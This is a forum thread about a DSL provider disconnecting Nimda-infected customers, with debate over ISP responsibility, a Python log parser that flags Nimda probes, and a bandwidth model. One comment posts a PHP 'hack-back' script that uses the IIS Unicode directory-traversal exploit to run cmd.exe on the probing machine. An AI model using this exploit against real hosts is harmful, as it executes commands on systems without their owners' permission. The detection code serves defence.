Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes, it's the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) for his box getting hacked. If you're on the net, it's your responsibility to stay safe.
http://twitter.com/onion2k
You attempted to hack their webserver. Anyone who attempts to hack them gets their connection cut off. Seems a relatively sensible policy in the terms and conditions to me.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. (Einstein)
They are just packets and that should be that.
They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.
Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.
(This is a bit off topic, but I figured I'd mention it here for those who think that viruses and worms don't cost anyone any real money...
Wednesday the 19th, my place of employment had to shut down entirely between the hours of about 7pm and around 10pm. Where I work, that kind of shutdown costs tens of thousands of dollars. Not to mention all of the hourly workers who were sent home at 7pm. Since their shift ended at 11, they were literally out 4 hours of pay even though they don't actually work with the systems that were affected. Lost production. Lost sales. Lost wages. One tiny, preventable worm.)
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant disregard of basic sysadmin responsibilities: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infected machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
I pay a lot of money for my leased line. So do my ISP's other customers. A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems. The service my ISP is able to provide me is consequently degraded, and I'm not happy about it.
If an ISP emerges who only accepts clueful customers, I'm likely to move my account. ISPs know this: if they don't switch off the clueless (and consequently troublesome) customers, they will lose the clueful (and consequently more profitable) ones.
I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.
I'm old enough to remember when discussions on Slashdot were well informed.
Oh, that's just pathetic.... You would only use the "but what about the elderly and the children" argument to drum up emotion when you have no other logical argument. To respond in kind, what about the other 75 year old senior citizens who have a clean computer and can't read web pages or send mail to their grandkids because the network is so flooded that they can't get anything through. Do you think they'll understand why this "dang new-fangled contraption ain't workin'?"
I'm not a cold-hearted person, but you've got to look at the facts. Shutting down these connections is pretty much the only way to make sure people will clean up their machines. You can't forget that the Code Red II virus, and presumably nimda as well, opens up a nice little hole that can be used to turn your machine into a Zombie. If the zombies get used, an ISP will have machines on their network attacking corporate and government computer systems. That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.
The best idea I've seen yet is the one to set up a "private" network for the infecting machines and direct them there. For those ISP's that don't want that expense, maybe offering to send them a CD with the patches and instructions in the mail for a reasonable fee would be a better alternative.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
I pay for DSL, i can run *WHATEVER* i want on it.
bull... what company do you go by that doesn't have a hugeass EULA?
And keep in mind that EULAs and any sort of contract are 98% CYA... They're there with tonnes of clauses that you will violate every day but are there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why no one reads the EULAs on software, they just click "yeah I agree, let's get on with it". The EULAs are there so if you do something annoying, they can nail you for it.
NO CONTRACT SHOULD EVER LIMIT FUNDAMENTAL HUMAN RIGHTS
SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be reasonable TOSs, and when there isn't, that's where the government is supposed to step in to limit what they can do.
I think that you're going a little haywire though with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards the MPAA or RIAA.
If God gave us curiosity
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe":

<?php
/* Open a connection to the offender (the host that just requested /scripts/root.exe).
   $_SERVER is used here instead of the old register_globals variables. */
$remote_addr = $_SERVER['REMOTE_ADDR'];
$fp = fsockopen($remote_addr, 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
    /* ...and send it */
    fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\n\n");
    /* close the connection (though it probably got closed automatically) */
    fclose ($fp);
}
/* for fun and confusion.. answer the worm's request with a fake Apache 404 page */
header ("HTTP/1.0 404 Not Found");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n");
echo ("<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n");
echo ("</body></html>\n");
/* log the offender's address and the time it was warned */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $remote_addr . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then, after making sure users can access the file, try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:

/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
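As an added example, not part of the original thread and not the poster's script: the ISP-side view of the same problem. Rather than answering each probe, this Python parses an ordinary Apache access log for the request paths the thread identifies as Nimda probes (/scripts/root.exe and the ..%c0%af.. traversal to cmd.exe), counts them per client address, and then applies the walled-garden policy suggested earlier in the thread (web traffic from infected customers redirected to a remediation server, everything else dropped, clean customers untouched). The log lines are constructed, and the threshold, the policy labels and the assumption that the infected hosts are the ISP's own customers are illustrative choices.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Apache "common" log format: host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request paths the thread describes as Nimda probes. %c0%af is an overlong
# UTF-8 encoding of '/', which unpatched IIS decoded after its path check.
NIMDA_SIGNATURES = (
    re.compile(r'/scripts/root\.exe', re.I),
    re.compile(r'/msadc/.*%c0%af', re.I),
    re.compile(r'/winnt/system32/cmd\.exe\?/c\+', re.I),
)

# Constructed sample log (not real traffic); 10.0.0.x stand in for customers.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2001:07:01:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
10.0.0.5 - - [19/Sep/2001:07:01:13 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.0.9 - - [19/Sep/2001:07:02:40 -0400] "GET /index.html HTTP/1.1" 200 1432
10.0.0.23 - - [19/Sep/2001:07:03:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
10.0.0.9 - - [19/Sep/2001:07:05:55 -0400] "GET /images/logo.gif HTTP/1.1" 200 9812
this line is not in common log format and is skipped
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one common-log-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_nimda_probe(path: str) -> bool:
    """True if the request path matches any of the probe signatures above."""
    return any(sig.search(path) for sig in NIMDA_SIGNATURES)


def infected_hosts(lines: List[str], threshold: int = 1) -> Dict[str, int]:
    """Map client address -> number of probes, keeping clients at or above threshold."""
    counts: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is not None and is_nimda_probe(rec["path"]):
            counts[rec["host"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def quarantine_decision(infected: Dict[str, int], src_ip: str, dst_port: int) -> str:
    """Walled-garden policy from the thread: an infected customer's web traffic is
    redirected to the remediation server, its other traffic is dropped, and
    clean customers are left alone."""
    if src_ip not in infected:
        return "allow"
    return "redirect-to-remediation" if dst_port == 80 else "drop"


if __name__ == "__main__":
    found = infected_hosts(SAMPLE_LOG.splitlines())
    for ip, n in sorted(found.items()):
        print(f"{ip}: {n} probe(s) -> "
              f"port 80 {quarantine_decision(found, ip, 80)}, "
              f"other ports {quarantine_decision(found, ip, 25)}")
```

The threshold exists because a single probe can also come from a scanner rather than a worm; an ISP that acts on this list would raise it and confirm against its own customer address ranges before cutting anyone off.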
I don't believe that is the reason why the provider shut down their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all users' subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer's bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.
If they don't know about, or stop, the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider knows that the trending data is bad, they have one of two choices:
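A worked version of the capacity model in the post above, added here as an example and not part of the original thread: the provider buys f(X) on the assumption that a normal customer is active a couple of hours a day on a few days a week, while an infected host runs at its full subscribed rate around the clock. Every parameter (10000 subscribers, a 1500 kbps access rate, 2 hours a day on 4 days a week, a 50% planning margin on top of the expected load) is an assumption chosen for illustration; Fractions keep the arithmetic exact so the saturation point is not blurred by rounding.

```python
from fractions import Fraction
from math import floor


def expected_duty_cycle(hours_per_day: int, days_per_week: int) -> Fraction:
    """Fraction of the week a normal (clean) customer is actually pushing traffic."""
    return Fraction(hours_per_day, 24) * Fraction(days_per_week, 7)


def provisioned_capacity(subscribers: int, rate_kbps: int, duty: Fraction,
                         margin_percent: int) -> Fraction:
    """f(X): capacity bought for X subscribers. Far below X * rate, because only
    a 'duty' fraction of customers is expected to be active; margin_percent is
    the planning headroom on top of that expectation (assumed, not from the post)."""
    return subscribers * rate_kbps * duty * (1 + Fraction(margin_percent, 100))


def demand(subscribers: int, rate_kbps: int, duty: Fraction, infected: int) -> Fraction:
    """Aggregate load: clean hosts average rate * duty, infected hosts run 7x24 at full rate."""
    return (subscribers - infected) * rate_kbps * duty + infected * rate_kbps


def max_infected_before_saturation(subscribers: int, rate_kbps: int, duty: Fraction,
                                   margin_percent: int) -> int:
    """Largest number of infected hosts f(X) can absorb before demand exceeds it."""
    headroom = (provisioned_capacity(subscribers, rate_kbps, duty, margin_percent)
                - demand(subscribers, rate_kbps, duty, infected=0))
    per_host_increase = rate_kbps * (1 - duty)   # extra load from one 7x24 host
    return floor(headroom / per_host_increase)


if __name__ == "__main__":
    duty = expected_duty_cycle(hours_per_day=2, days_per_week=4)
    limit = max_infected_before_saturation(10000, 1500, duty, 50)
    print(f"duty cycle {float(duty):.3%}; {limit} infected hosts out of 10000 "
          f"({limit / 100:.1f}%) saturate the provisioned capacity")
```

With these assumptions the planned headroom is exhausted once 250 of 10000 customers (2.5%) are infected, which is why a worm that touches only a small fraction of the customer base still shows up in the provider's trending data.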
I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some concession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.